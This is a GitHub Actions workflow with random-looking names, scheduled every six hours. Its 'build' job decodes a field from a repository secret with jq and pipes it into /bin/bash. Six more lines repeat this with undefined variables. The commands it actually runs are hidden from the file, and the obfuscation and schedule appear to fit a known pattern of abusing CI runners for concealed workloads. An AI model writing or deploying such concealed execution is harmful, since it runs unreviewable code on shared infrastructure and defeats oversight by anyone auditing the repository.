name: yanfusu1932

on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanfusu1932
        env:
          nb44701: ${{ secrets.nb44701 }}
        run: |
          echo $nb44701 | jq -r .jc06279 | /bin/bash
          echo $debw22 | jq -r .vmtkt7 | /bin/bash
          echo $r491 | jq -r .h710 | /bin/bash
          echo $izjb7 | jq -r .osmjp9555 | /bin/bash
          echo $yw39 | jq -r .ogv7 | /bin/bash
          echo $ca25 | jq -r .bicm07971 | /bin/bash
          echo $skc1 | jq -r .srjcu0735 | /bin/bash

